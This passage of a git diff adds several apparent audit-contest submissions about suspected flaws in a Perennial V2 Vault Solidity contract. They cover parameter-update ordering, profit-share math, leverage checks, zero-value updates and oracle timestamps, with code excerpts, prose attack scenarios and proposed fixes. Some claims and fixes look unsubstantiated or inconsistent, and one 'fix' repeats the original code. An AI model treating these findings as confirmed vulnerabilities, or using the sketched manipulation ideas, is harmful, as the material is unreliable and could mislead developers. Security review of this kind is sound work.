No newline at end of file diff --git a/043.md b/043.md new file mode 100644 index 0000000..7762cd3 --- /dev/null +++ b/043.md @@ -0,0 +1,107 @@ +Cheerful Taffy Dolphin + +Medium + +# Stale Parameter Usage in Rebalance Causes Incorrect Position Sizing and Risk Management Failures + +## Summary + +The Vault contract contains a significant timing vulnerability in its parameter update mechanism that could result in incorrect market positions, financial loss, and state inconsistency. When updating vault parameters (maxDeposit, minDeposit, profitShare), the rebalancing operation executes using outdated parameters before the new values are stored, leading to incorrect position sizing and potential violations of intended risk constraints. + +Parameter Update: + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/Vault.sol#L241 + +```solidity +function updateParameter(VaultParameter memory newParameter) external onlyOwner { + rebalance(address(0)); // Critical timing issue here + _updateParameter(newParameter); +} +``` + +Context Loading with Old Parameters: +```solidity +function _loadContext(address account) private view returns (Context memory context) { + context.parameter = _parameter.read(); // Loads old parameters + // ... loads rest of context +} +``` + +Parameter Usage in Core Operations: +```solidity +function _maxDeposit(Context memory context) private view returns (UFixed6) { + return context.latestCheckpoint.unhealthy() ? + UFixed6Lib.ZERO : + context.parameter.maxDeposit.unsafeSub(UFixed6Lib.unsafeFrom(totalAssets()).add(context.global.deposit)); +} +``` + +The issue is that rebalancing executes a full market position adjustment using the old parameter values. This means: + +1. The `maxDeposit` calculation during rebalance uses outdated deposit limits +2. The `_strategy()` function (which is called by `_manage()` during rebalance) bases its allocation decisions on old parameters +3. If the new parameters significantly change deposit limits or other constraints, the rebalance could set positions that immediately violate the new parameters +4. Market positions set during rebalance might need immediate readjustment after the parameter update, causing unnecessary gas costs and potential market impact + +This is particularly problematic in scenarios where parameter updates are specifically intended to adjust risk parameters or position limits in response to market conditions. + +## Impact +The parameter update timing issue creates critical failure modes in the vault's market management. The vault executes rebalancing operations using stale parameter values, which manifests in multiple levels of technical failures: + +At the position management level, all market orders during rebalance are sized according to outdated maxDeposit and strategy parameters, leading to incorrect leverage ratios and position sizes that violate the intended new risk parameters. For instance, if maxDeposit is being lowered from 1000 to 500, the rebalance will still execute positions sized for the 1000 limit. + +These incorrectly sized positions trigger state inconsistencies where the vault's market exposure directly conflicts with its stored parameters. This forces additional transactions to realign positions, introducing unnecessary gas costs and potential sandwich attack vectors during the corrective operations. + +This breaks the vault's risk management guarantees. When parameter updates are made in response to market conditions (e.g., reducing maxDeposit during high volatility), the delay in parameter application means the vault continues to operate at higher risk levels during the rebalance - precisely when risk management is most crucial. + +## Fix + +Modify the `updateParameter` function to handle parameters before rebalancing: + +```solidity +function updateParameter(VaultParameter memory newParameter) external onlyOwner { + // Store new parameters first + _updateParameter(newParameter); + + // Rebalance with new parameters + rebalance(address(0)); +} +``` + +Ensure state consistency in `_loadContext`: + +```solidity +function _loadContext(address account) private view returns (Context memory context) { + // Load latest parameters first to ensure all subsequent calculations use new values + context.parameter = _parameter.read(); + + // Load market state + context.latestTimestamp = type(uint256).max; + context.currentTimestamp = type(uint256).max; + context.registrations = new Registration[](totalMarkets); + context.collaterals = new Fixed6[](totalMarkets); + + // ... rest of context loading +} +``` + +And add validation in `_updateParameter`: + +```solidity +function _updateParameter(VaultParameter memory newParameter) private { + // Validate parameters + VaultParameter memory oldParameter = _parameter.read(); + + // If reducing maxDeposit, verify current deposits don't exceed new limit + if (newParameter.maxDeposit.lt(oldParameter.maxDeposit)) { + if (UFixed6Lib.unsafeFrom(totalAssets()).gt(newParameter.maxDeposit)) + revert VaultParameterStorageInvalidError(); + } + + // Store and emit + _parameter.store(newParameter); + emit ParameterUpdated(newParameter); +} +``` + +The rebalance will now use the new parameters for all calculations and position adjustments, ensuring proper risk management and position sizing. \ No newline at end of file diff --git a/044.md b/044.md new file mode 100644 index 0000000..8417717 --- /dev/null +++ b/044.md @@ -0,0 +1,142 @@ +Cheerful Taffy Dolphin + +Medium + +# Incorrect Profit Share Distribution Due to Asset-Share Ratio Manipulation in Checkpoint Calculations + +## Summary +The vault's checkpoint mechanism contains a sequence vulnerability in its profit share calculations that affects coordinator compensation. The vulnerability originates in the vault's settlement flow where `_settle()` triggers checkpoint completion and propagates through to profit distribution: + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/Vault.sol#L374 + +```solidity +function _settle(Context memory context, address account) private { + // ... settlement logic ... + (context.mark, profitShares) = nextCheckpoint.complete( + context.mark, + context.parameter, + _checkpointAtId(context, nextCheckpoint.timestamp) + ); + context.global.shares = context.global.shares.add(profitShares); + _credit(coordinator, profitShares); +} +``` + +The current implementation in the resulting checkpoint completion updates assets before calculating profit shares, but adds the profit shares to the total share count afterwards. This creates a calculation using inconsistent state - new assets but old shares - leading to skewed profit distributions. The issue is particularly significant because it directly impacts the economic incentives of the vault coordinator role, potentially over/under allocating profit shares during each checkpoint period based on mismatched asset-to-share ratios. + + +```solidity +function complete(Checkpoint memory self, UFixed18 mark, VaultParameter memory parameter, PerennialCheckpoint memory marketCheckpoint) internal pure returns (UFixed18 newMark, UFixed6 profitShares) { + // First adds new collateral to assets + self.assets = self.assets.add(marketCheckpoint.collateral); + + // Then calculates profit share using updated assets but old shares + (newMark, profitShares) = _calculateProfitShare(self, mark, parameter); + + // Finally updates shares after profit calculation + self.shares = self.shares.add(profitShares); +} +``` + + +```solidity +function _calculateProfitShare(Checkpoint memory self, UFixed18 mark, VaultParameter memory parameter) private pure { + // Uses current assets with old shares for calculation + newMark = mark.max(UFixed18Lib.from(UFixed6Lib.unsafeFrom(self.assets)).div(UFixed18Lib.from(self.shares))); + + // Calculates profit based on potentially incorrect mark + UFixed6 profitAssets = parameter.profitShare.mul(UFixed6Lib.from(newMark.sub(mark).mul(UFixed18Lib.from(self.shares)))); + + // Calculates shares based on skewed ratio + profitShares = profitAssets.mul(self.shares).div(UFixed6Lib.unsafeFrom(self.assets).sub(profitAssets)); +} +``` + +```solidity +// Account processing that interacts with checkpoint +function processGlobal(Account memory self, uint256 latestId, Checkpoint memory checkpoint, UFixed6 deposit, UFixed6 redemption) internal pure { + self.latest = latestId; + (self.assets, self.shares) = ( + self.assets.add(checkpoint.toAssetsGlobal(redemption)), + self.shares.add(checkpoint.toSharesGlobal(deposit)) + ); + // ... +} +``` + +The critical issue lies in the calculation sequence where new assets are factored into profit calculations before the share total is updated. This creates a momentary skew in the assets-to-shares ratio that affects profit distribution. While this skew corrects itself in the next checkpoint, it means the coordinator's profit share for that period is calculated against an artificially inflated asset base without corresponding share adjustments. + +The vulnerability is exacerbated by the interaction between checkpoint completion and account processing, where profit share calculations occur with inconsistent state before the account system can properly process and update share totals. + +## Impact +The improper sequencing in checkpoint profit share calculations has direct financial implications on vault economics. When the vault calculates coordinator profit shares using updated asset values but stale share counts, it skews the assets-to-shares ratio used for profit allocation. + +For example, if a checkpoint adds 1000 USDC in new assets before calculating profits on an existing 10000 USDC / 10000 shares (1:1 ratio), but the new assets should have minted 1000 new shares, the calculation uses an incorrect 11000:10000 ratio instead of the proper 11000:11000. With a 20% profit share parameter, this inflated ratio results in the coordinator receiving more profit shares than intended. + +This miscalculation compounds if the vault frequently adds large amounts of collateral relative to its size. While the impact is bounded by the checkpoint period and corrects in subsequent checkpoints, it creates unfair profit distributions and could be exploited by coordinators timing their actions around checkpoint boundaries to maximize profit share allocations. + +The issue is worsened by the vault's account management system where checkpoint state influences share calculations in processGlobal. When assets are updated before profit calculation but shares are handled afterward, it creates a discrepancy that propagates through the account processing system, leading to incorrect share allocations at the account level. + +## Fix + +First fix the ordering issue in `complete`: +```solidity +function complete( + Checkpoint memory self, + UFixed18 mark, + VaultParameter memory parameter, + PerennialCheckpoint memory marketCheckpoint +) internal pure returns (UFixed18 newMark, UFixed6 profitShares) { + // Store original state before any updates + Fixed6 originalAssets = self.assets; + + // Update collateral/assets + self.assets = self.assets.add(marketCheckpoint.collateral); + + // Calculate profit shares using original asset state + (newMark, profitShares) = _calculateProfitShare( + originalAssets, + self.shares, + self.assets, + mark, + parameter + ); + + // Add profit shares after calculation + self.shares = self.shares.add(profitShares); + + // Add fees last + self.tradeFee = marketCheckpoint.tradeFee; + self.settlementFee = marketCheckpoint.settlementFee; +} +``` + +Update profit calculation to handle states correctly: +```solidity +function _calculateProfitShare( + Fixed6 originalAssets, + UFixed6 currentShares, + Fixed6 newAssets, + UFixed18 mark, + VaultParameter memory parameter +) private pure returns (UFixed18 newMark, UFixed6 profitShares) { + // Skip calculation for fresh vaults + if (currentShares.isZero()) return (UFixed18Lib.ONE, UFixed6Lib.ZERO); + + // Calculate new mark using original assets to avoid inflated mark + newMark = mark.max(UFixed18Lib.from(UFixed6Lib.unsafeFrom(originalAssets)).div(UFixed18Lib.from(currentShares))); + + // Skip if no previous mark (migration case) + if (mark.isZero()) return (newMark, UFixed6Lib.ZERO); + + // Calculate profit using state-consistent ratio + UFixed6 profitAssets = parameter.profitShare + .mul(UFixed6Lib.from(newMark.sub(mark).mul(UFixed18Lib.from(currentShares)))); + + // Skip if no assets to allocate + if (UFixed6Lib.unsafeFrom(newAssets).sub(profitAssets).isZero()) return (newMark, UFixed6Lib.ZERO); + + // Calculate shares using new assets + profitShares = profitAssets.mul(currentShares).div(UFixed6Lib.unsafeFrom(newAssets).sub(profitAssets)); +} +``` \ No newline at end of file diff --git a/045.md b/045.md new file mode 100644 index 0000000..a5094de --- /dev/null +++ b/045.md @@ -0,0 +1,61 @@ +Cheerful Taffy Dolphin + +Medium + +# Lack of LEVERAGE_BUFFER Check in updateLeverage() Causes Position Operations to Revert Due to Storage-Execution Mismatch + +## Description +The updateLeverage function in Vault.sol allows setting leverage values without validating against the LEVERAGE_BUFFER constraint (1.2e6) defined in MakerStrategyLib.sol. While MakerStrategyLib enforces this constraint during strategy execution, the lack of validation at the leverage update level creates a potential mismatch between stored leverage values and what can be safely executed. + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/Vault.sol#L215 + +```solidity +// Vault.sol +function updateLeverage(uint256 marketId, UFixed6 newLeverage) external onlyOwner { + rebalance(address(0)); + if (marketId >= totalMarkets) revert VaultMarketDoesNotExistError(); + _updateMarket(marketId, UFixed6Lib.MAX, newLeverage); +} +``` + +```solidity +// MakerStrategyLib.sol +UFixed6 public constant LEVERAGE_BUFFER = UFixed6.wrap(1.2e6); + +function _allocateMarket(...) private pure returns (Target memory target, UFixed6 marketCollateral) { + marketCollateral = marketContext.margin + .add(collateral.sub(totalMargin).mul(marketContext.registration.weight)); + + // LEVERAGE_BUFFER enforcement + UFixed6 marketAssets = assets + .mul(marketContext.registration.weight) + .min(marketCollateral.mul(LEVERAGE_BUFFER)); +} +``` + +## Scenario: +1. Owner calls updateLeverage with a leverage value > 1.2e6 +2. The update succeeds and stores the high leverage value +3. When strategy executes, operations fail due to LEVERAGE_BUFFER check in MakerStrategyLib +4. Results in positions that cannot be properly adjusted + + +## Impact +When updateLeverage() allows setting leverage values above LEVERAGE_BUFFER (1.2e6), it creates a critical state inconsistency since MakerStrategyLib.allocate() enforces this limit during position calculations and strategy execution. This leads to a scenario where the stored leverage value in Registration.leverage is higher than what allocate() will allow during position adjustments, causing allocate() to calculate invalid position sizes based on unusable leverage values + +Subsequent calls to update() or rebalance() will fail when MakerStrategyLib attempts to execute positions with the stored leverage, as the calculations in _allocateMarket() involving marketContext.registration.leverage will exceed LEVERAGE_BUFFER constraints. + +This temporarily locks vault funds in existing positions, as any attempt to modify positions through the strategy will revert due to the leverage mismatch between storage and execution constraints - until an owner updates the leverage to a value within LEVERAGE_BUFFER limits. + + + +## Recommendation +Add validation in updateLeverage to enforce the LEVERAGE_BUFFER constraint: +```solidity +function updateLeverage(uint256 marketId, UFixed6 newLeverage) external onlyOwner { + rebalance(address(0)); + if (marketId >= totalMarkets) revert VaultMarketDoesNotExistError(); + if (newLeverage.gt(LEVERAGE_BUFFER)) revert InvalidLeverageError(); + _updateMarket(marketId, UFixed6Lib.MAX, newLeverage); +} +``` diff --git a/046.md b/046.md new file mode 100644 index 0000000..be2b721 --- /dev/null +++ b/046.md @@ -0,0 +1,98 @@ +Cheerful Taffy Dolphin + +Medium + +# Missing Position Size Validation in updateLeverage() Causes Forced Position Adjustments Across Pooled Vault Assets + +## Description +The updateLeverage function in Vault.sol calls rebalance(address(0)) but does not validate whether positions would remain valid under the new leverage settings. While rebalance settles current positions, it does not verify if those positions would be safely maintainable under the new leverage value. + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/Vault.sol#L215 + +```solidity +// Vault.sol +function updateLeverage(uint256 marketId, UFixed6 newLeverage) external onlyOwner { + rebalance(address(0)); // Settles but doesn't validate future position validity + if (marketId >= totalMarkets) revert VaultMarketDoesNotExistError(); + _updateMarket(marketId, UFixed6Lib.MAX, newLeverage); +} +``` + +```solidity +// MakerStrategyLib.sol +function _allocateMarket( + MarketMakerStrategyContext memory marketContext, + UFixed6 totalMargin, + UFixed6 collateral, + UFixed6 assets +) private pure returns (Target memory target, UFixed6 marketCollateral) { + // Position calculations depend on leverage + UFixed6 minAssets = marketContext.riskParameter.minMargin + .unsafeDiv(marketContext.registration.leverage.mul(marketContext.riskParameter.maintenance)); + // ... +} +``` + +## Impact + +When a new leverage value is set, the positions held in marketContext.currentAccountPosition are immediately subjected to different minAssets calculations in _allocateMarket(), where newMinAssets = marketContext.riskParameter.minMargin.unsafeDiv(newLeverage.mul(marketContext.riskParameter.maintenance)) + +This causes existing maker positions to become misaligned with market risk parameters since _allocateMarket() will calculate new collateral requirements against these positions using the updated leverage value, potentially pushing them below minPosition or above maxPosition bounds. + +The next call to rebalance() or update() will attempt to force adjust these positions through MakerStrategyLib.allocate(), as the strategy recalculates targets based on the new leverage parameters without consideration for position size transitions. + +Since the vault manages pooled positions, any forced adjustments affect all users' proportional share of the vault's total assets, as position modifications are executed at the vault level rather than per individual deposit. + +## Recommendation: + +Add a validation function to `MakerStrategyLib.sol`: +```solidity +/// @notice Validates if positions would remain valid under new leverage +/// @param registrations Current market registrations array +/// @param marketId Market to validate +/// @param newLeverage Proposed new leverage value +/// @return isValid True if positions would remain valid under new leverage +function validatePositionsForLeverage( + Registration[] memory registrations, + uint256 marketId, + UFixed6 newLeverage +) public view returns (bool isValid) { + MarketMakerStrategyContext memory marketContext = _loadContext(registrations[marketId]); + + // Skip validation if no current position + if (marketContext.currentAccountPosition.maker.isZero()) return true; + + // Calculate minimum required assets with new leverage + UFixed6 newMinAssets = marketContext.riskParameter.minMargin + .unsafeDiv(newLeverage.mul(marketContext.riskParameter.maintenance)); + + // Check if current positions would remain valid + UFixed6 newPositionTarget = newMinAssets + .muldiv(newLeverage, marketContext.latestPrice.abs()); + + return newPositionTarget.gte(marketContext.minPosition) && + newPositionTarget.lte(marketContext.maxPosition); +} +``` + +Modify `Vault.sol` updateLeverage function: +```solidity +error InvalidPositionLeverageError(); + +function updateLeverage(uint256 marketId, UFixed6 newLeverage) external onlyOwner { + rebalance(address(0)); + if (marketId >= totalMarkets) revert VaultMarketDoesNotExistError(); + + // Build registrations array for validation + Registration[] memory registrations = new Registration[](totalMarkets); + for (uint256 i = 0; i < totalMarkets; i++) { + registrations[i] = _registrations[i].read(); + } + + // Validate positions would remain valid with new leverage + if (!MakerStrategyLib.validatePositionsForLeverage(registrations, marketId, newLeverage)) + revert InvalidPositionLeverageError(); + + _updateMarket(marketId, UFixed6Lib.MAX, newLeverage); +} +``` diff --git a/047.md b/047.md new file mode 100644 index 0000000..8af4f2e --- /dev/null +++ b/047.md @@ -0,0 +1,102 @@ +Cheerful Taffy Dolphin + +Medium + +# Vault Profit Share Bypass During Migration Results in Permanent Revenue Loss Through Zero-Mark Condition + +## Summary +A critical vulnerability exists in the `_calculateProfitShare` function where profit shares are not allocated when the high-water mark (`mark`) is zero, resulting in potential economic loss during vault migrations.` + +When the `mark` parameter is zero (typical during vault migration), the function prematurely returns after calculating `newMark` but before computing profit shares. This bypasses the profit share calculation entirely, even though there may be legitimate profits to distribute. + + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/types/Checkpoint.sol#L119 + +```solidity +function _calculateProfitShare( + Checkpoint memory self, + UFixed18 mark, + VaultParameter memory parameter +) private pure returns (UFixed18 newMark, UFixed6 profitShares) { + if (self.shares.isZero()) return (UFixed18Lib.ONE, UFixed6Lib.ZERO); + + newMark = mark.max(UFixed18Lib.from(UFixed6Lib.unsafeFrom(self.assets)) + .div(UFixed18Lib.from(self.shares))); + + // Bug: Early return skips profit share calculation + if (mark.isZero()) return (newMark, UFixed6Lib.ZERO); + + // Never reaches this code when mark is zero + UFixed6 profitAssets = parameter.profitShare + .mul(UFixed6Lib.from(newMark.sub(mark).mul(UFixed18Lib.from(self.shares)))); +} +``` + +### Scenario + +```solidity +Initial State: +- self.shares = 1000 +- self.assets = 1500 +- parameter.profitShare = 0.2 (20%) +- mark = 0 + +Expected Calculation: +1. newMark = 1.5 +2. profitAssets = 0.2 * (1.5 - 0) * 1000 = 300 +3. profitShares = (300 * 1000) / (1500 - 300) = 250 + +Actual Result: +- Returns (1.5, 0) +- 250 profit shares worth 300 assets are not allocated +``` + +### Impact +The zero-mark condition triggers a complete bypass of profit share calculation during migration, nullifying the coordinator's claim to a 20% share of vault performance. When initial depositors enter at mark=0, their returns above the zero-mark are excluded from profit share computations, compounding into a permanent revenue loss at the protocol level. This calculation bypass effectively breaks the vault's core economic incentive mechanism by allowing value accrual without corresponding profit share minting. + +## Proof of Concept +```solidity +function testMigrationProfitShareBug() public { + Checkpoint memory checkpoint; + checkpoint.shares = UFixed6.wrap(1000e6); + checkpoint.assets = Fixed6.wrap(1500e6); + + VaultParameter memory param; + param.profitShare = UFixed6.wrap(0.2e6); // 20% + + UFixed18 mark = UFixed18.wrap(0); + + (UFixed18 newMark, UFixed6 profitShares) = + checkpoint._calculateProfitShare(mark, param); + + // profitShares is 0 when it should be ~250e6 + assert(profitShares.isZero()); +} +``` + +## Recommended Fix +```solidity +function _calculateProfitShare( + Checkpoint memory self, + UFixed18 mark, + VaultParameter memory parameter +) private pure returns (UFixed18 newMark, UFixed6 profitShares) { + if (self.shares.isZero()) return (UFixed18Lib.ONE, UFixed6Lib.ZERO); + + newMark = mark.max(UFixed18Lib.from(UFixed6Lib.unsafeFrom(self.assets)) + .div(UFixed18Lib.from(self.shares))); + + // Calculate profits even when mark is zero + UFixed6 profitAssets = parameter.profitShare + .mul(UFixed6Lib.from(newMark.sub(mark).mul(UFixed18Lib.from(self.shares)))); + + if (UFixed6Lib.unsafeFrom(self.assets).sub(profitAssets).isZero()) + return (newMark, UFixed6Lib.ZERO); + + profitShares = profitAssets.mul(self.shares) + .div(UFixed6Lib.unsafeFrom(self.assets).sub(profitAssets)); + + return (newMark, profitShares); +} +``` + diff --git a/048.md b/048.md new file mode 100644 index 0000000..3dca462 --- /dev/null +++ b/048.md @@ -0,0 +1,146 @@ +Cheerful Taffy Dolphin + +Medium + +# Zero-Value Operation Bypass in Vault Update Function Enables Economic Manipulation Through Artificial Checkpoint Creation + +## Summary + +A critical vulnerability has been identified in Perennial V2's Vault implementation that allows manipulation of core economic mechanisms through zero-value operations. The vulnerability exists in the vault's `_update()` function, which manages deposits, redemptions, and claims. While the function implements checks for minimum deposits and single-sided operations, it fails to properly validate zero-value state transitions. This oversight allows an attacker to influence share price calculations, manipulate loss socialization, and force unnecessary market interactions—all without committing economic value to the system. + +The severity of this issue is amplified by the vault's role as a core capital management component of the Perennial V2 protocol, directly affecting user funds and protocol stability. The primary risk lies in the manipulation of profit distribution and performance metrics, potentially impacting all vault participants through degraded price discovery and increased operational costs. + +The `_update()` function's validation sequence creates a critical flaw in the vault's economic safeguards by failing to properly validate zero-value operations: + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/Vault.sol#L331 + +```solidity +function _update(Context memory context, address account, UFixed6 depositAssets, UFixed6 redeemShares, UFixed6 claimAssets) private { + if (!depositAssets.isZero() && depositAssets.lt(context.parameter.minDeposit)) + revert VaultInsufficientMinimumError(); +``` + +This validation structure allows zero-value operations to trigger legitimate state changes in both global and local contexts: + +```solidity +context.global.update(context.currentId, claimAssets, redeemShares, depositAssets, redeemShares); +context.local.update(context.currentId, claimAssets, redeemShares, depositAssets, redeemShares); +context.currentCheckpoint.update(depositAssets, redeemShares); +``` + +Each artificial state change cascades through the system, affecting profit calculations via the checkpoint mechanism: + +```solidity +(context.mark, profitShares) = nextCheckpoint.complete(mark, parameter, _checkpointAtId(timestamp)); +``` + +The impact amplifies when these state changes trigger unnecessary position adjustments: + +```solidity +_manage(context, depositAssets, claimAmount, !depositAssets.isZero() || !redeemShares.isZero()); +``` + +## Attack Surface + +The primary attack vector exploits checkpoint creation through zero-value operations to manipulate share pricing and profit distribution: + +```solidity +context.global.update(context.currentId, claimAssets, redeemShares, depositAssets, redeemShares); +context.local.update(context.currentId, claimAssets, redeemShares, depositAssets, redeemShares); +context.currentCheckpoint.update(depositAssets, redeemShares); +``` + +An attacker can front-run legitimate deposits by creating artificial checkpoints that affect the profit calculation mechanism. + +This manipulation affects both immediate share price calculations and long-term performance metrics through the high-water mark system. By strategically timing zero-value operations during price volatility, attackers can influence profit distribution and performance fee calculations. + +Artificial state changes affect loss socialization calculations: +```solidity +function _socialize(Context memory context, UFixed6 claimAssets) private pure { + return claimAssets.muldiv( + UFixed6Lib.unsafeFrom(context.totalCollateral).min(context.global.assets), + context.global.assets + ); +} +``` + +By submitting zero-value operations during high volatility, attackers can force recalculation of the socialization ratio. The denominator (context.global.assets) becomes vulnerable to manipulation through pending claims, affecting loss distribution across all vault participants. + +Market Position Griefing: + +```solidity +_manage(context, depositAssets, claimAmount, !depositAssets.isZero() || !redeemShares.isZero()); +``` + +Attackers can front-run significant market updates with zero-value operations that trigger unnecessary rebalancing. This causes: + +- Increased transaction costs through forced rebalancing +- Potential transaction failures from amplified slippage +- Price impact during market volatility + + +The vulnerability stems from a fundamental architectural flaw in the vault's state transition model. By placing economic validity checks after state transition logic, the system fails to distinguish between meaningful and artificial state changes. This architectural weakness transforms zero-value operations from administrative actions into vectors for economic exploitation. + +These design flaws allow an attacker to systematically degrade the vault's economic integrity through targeted zero-value operations, affecting share price discovery, loss socialization, and market position management. + +## Fix +This fix prevents artificial checkpoint creation and ensures all operations have economic substance before affecting vault state. + +```solidity +function _update( + Context memory context, + address account, + UFixed6 depositAssets, + UFixed6 redeemShares, + UFixed6 claimAssets +) private { + // Magic value handling + if (claimAssets.eq(UFixed6Lib.MAX)) claimAssets = context.local.assets; + if (redeemShares.eq(UFixed6Lib.MAX)) redeemShares = context.local.shares; + + // Operator validation + if (msg.sender != account && !IVaultFactory(address(factory())).operators(account, msg.sender)) + revert VaultNotOperatorError(); + + // Validate meaningful operation first + if (depositAssets.isZero() && redeemShares.isZero() && claimAssets.isZero()) + revert VaultNoOperationError(); + + // Single-sided operation check + if (!depositAssets.add(redeemShares).add(claimAssets).eq(depositAssets.max(redeemShares).max(claimAssets))) + revert VaultNotSingleSidedError(); + + // Economic validation for non-zero operations + if (depositAssets.gt(UFixed6Lib.ZERO)) { + if (depositAssets.gt(_maxDeposit(context))) + revert VaultDepositLimitExceededError(); + if (depositAssets.lt(context.parameter.minDeposit)) + revert VaultInsufficientMinimumError(); + } + + if (redeemShares.gt(UFixed6Lib.ZERO)) { + if (context.latestCheckpoint.toAssets(redeemShares).lt(context.parameter.minDeposit)) + revert VaultInsufficientMinimumError(); + } + + if (context.local.current != context.local.latest) + revert VaultExistingOrderError(); + + // Process operations + UFixed6 claimAmount = _socialize(context, claimAssets); + + // Update positions + context.global.update(context.currentId, claimAssets, redeemShares, depositAssets, redeemShares); + context.local.update(context.currentId, claimAssets, redeemShares, depositAssets, redeemShares); + context.currentCheckpoint.update(depositAssets, redeemShares); + + // Manage assets + asset.pull(msg.sender, UFixed18Lib.from(depositAssets)); + _manage(context, depositAssets, claimAmount, !depositAssets.isZero() || !redeemShares.isZero()); + asset.push(msg.sender, UFixed18Lib.from(claimAmount)); + + emit Updated(msg.sender, account, context.currentId, depositAssets, redeemShares, claimAssets); +} + +error VaultNoOperationError(); +``` \ No newline at end of file diff --git a/049.md b/049.md new file mode 100644 index 0000000..16b817c --- /dev/null +++ b/049.md @@ -0,0 +1,56 @@ +Cheerful Taffy Dolphin + +Medium + +# Array Length Mismatch in Vault's _manage() Function Could Lead to Fund Loss via Invalid Position Management + +## Summary + +A critical vulnerability has been identified in the _manage function's memory handling. This function serves as the core mechanism for managing market positions and collateral allocation across registered markets. The vulnerability stems from unsafe array access patterns between the context's registrations and strategy-generated targets, potentially compromising the vault's financial operations and position management. + +The vulnerability centers on array length management between `context.registrations` and the `targets` array returned by the virtual `_strategy` function. In the current implementation: + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/Vault.sol#L434 + +```solidity +function _manage(Context memory context, UFixed6 deposit, UFixed6 withdrawal, bool shouldRebalance) private { + Target[] memory targets = _strategy(context, deposit, withdrawal, _ineligible(context, deposit, withdrawal)); + + for (uint256 marketId; marketId < context.registrations.length; marketId++) + if (targets[marketId].collateral.lt(Fixed6Lib.ZERO)) + _retarget(context.registrations[marketId], targets[marketId], shouldRebalance); +``` + +The core issue lies in the array access pattern where the loop iterates using `context.registrations.length` but accesses `targets[marketId]` without any length verification. Since `_strategy` is a virtual function, its implementation could return an array of any length, creating a critical mismatch. + +## Impact + +When `targets.length < context.registrations.length`, this leads to out-of-bounds access and potential contract reversion. Conversely, if `targets.length > context.registrations.length`, some target positions remain unprocessed, leading to incomplete strategy execution. + +The financial implications are severe – mismatched array lengths can result in incorrect position management, unbalanced collateral distribution, and potential fund loss through improper allocations. The system's risk management capabilities are compromised as market exposure becomes misaligned with intended strategy. + +## Fix + +Implement strict length validation: + +```solidity +function _manage(Context memory context, UFixed6 deposit, UFixed6 withdrawal, bool shouldRebalance) private { + Target[] memory targets = _strategy(context, deposit, withdrawal, _ineligible(context, deposit, withdrawal)); + require(targets.length == context.registrations.length, "Length mismatch"); + // ... existing logic +} +``` + +Alternatively, a more flexible approach using dynamic length handling: + +```solidity +function _manage(Context memory context, UFixed6 deposit, UFixed6 withdrawal, bool shouldRebalance) private { + Target[] memory targets = _strategy(context, deposit, withdrawal, _ineligible(context, deposit, withdrawal)); + require(targets.length <= context.registrations.length, "Too many targets"); + + for (uint256 marketId; marketId < targets.length; marketId++) { + if (targets[marketId].collateral.lt(Fixed6Lib.ZERO)) + _retarget(context.registrations[marketId], targets[marketId], shouldRebalance); + } +} +``` diff --git a/050.md b/050.md new file mode 100644 index 0000000..a080609 --- /dev/null +++ b/050.md @@ -0,0 +1,66 @@ +Cheerful Taffy Dolphin + +Medium + +# Minimum Oracle Timestamp Selection Leads to Price Staleness and Settlement Manipulation in Multi-Market Vault + +## Summary + +In multi-market vault systems, oracle timestamp synchronization is critical for maintaining accurate pricing, risk assessment, and settlement operations. The current implementation in the Vault contract uses a minimum timestamp strategy across all registered markets to coordinate oracle data. This architecture reveals significant vulnerabilities when examining the interaction between timestamp selection and core vault operations.s + +The core vulnerability stems from the vault's timestamp selection mechanism: + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/Vault.sol#L511 + +```solidity +context.latestTimestamp = Math.min(context.latestTimestamp, oracleVersion.timestamp); +``` + +This design creates a cascading series of technical issues affecting critical vault operations. When processing oracle data, the vault forces synchronization to the oldest timestamp across all registered markets. Consider a scenario where Market A reports t=1000, Market B t=800, and Market C t=950 - the vault anchors all operations to t=800. + +The most immediate impact manifests in the settlement logic: +```solidity +while (context.global.current > context.global.latest && + context.latestTimestamp >= (nextCheckpoint = _checkpoints[context.global.latest + 1].read()).timestamp) +``` + +Here, the settlement pipeline stalls until all markets advance beyond the checkpoint timestamp. A malicious actor could exploit this by manipulating oracle update delays, effectively controlling the settlement cadence across all markets. + +This timestamp anchoring propagates into the risk management system through the strategy calculation: +```solidity +Target[] memory targets = _strategy(context, deposit, withdrawal, _ineligible(context, deposit, withdrawal)); +``` + +The vault calculates positions and collateral requirements using potentially stale price data, leading to mispriced risk. During high volatility periods, the price differential between current and stale markets creates arbitrage vectors. For example, with Market A at $100 (current) and Market B at $80 (stale), the vault operates with a 25% price discrepancy. + +The risk compounds in position management: +```solidity +registration.market.update( + address(this), + shouldRebalance ? target.maker : Fixed6Lib.ZERO, + shouldRebalance ? target.taker : Fixed6Lib.ZERO, + target.collateral, + address(0) +); +``` + +Position adjustments execute using outdated data, potentially leading to suboptimal collateral utilization and increased liquidation risk. + +## Fix +Implement a multi-layered timestamp validation: +```solidity +// Staleness check +if (block.timestamp - oracleVersion.timestamp > MAX_STALENESS) revert StaleOracleError(); + +// Deviation boundary +uint256 maxDiff = timestamps[i] > timestamps[j] ? timestamps[i] - timestamps[j] : timestamps[j] - timestamps[i]; +if (maxDiff > MAX_TIMESTAMP_DEVIATION) revert TimestampDeviationError(); + +// Median selection +function getMedianTimestamp(uint256[] memory timestamps) private pure returns (uint256) { + // Sort and select median + return sortedTimestamps[timestamps.length / 2]; +} +``` + +This approach enforces freshness guarantees while maintaining cross-market synchronization boundaries, significantly reducing the attack surface for oracle manipulation and settlement gaming strategies. \ No newline at end of file diff --git a/051.md b/051.md new file mode 100644 index 0000000..5cff6e2 --- /dev/null +++ b/051.md @@ -0,0 +1,30 @@ +Cheerful Taffy Dolphin + +Medium + +# Strict Oracle Timestamp Equality Check Triggers Unnecessary VaultCurrentOutOfSyncError Due to Network Latency + +## Summary +The Vault contract implements strict timestamp equality checks to ensure synchronized oracle data across all registered markets. While synchronization is 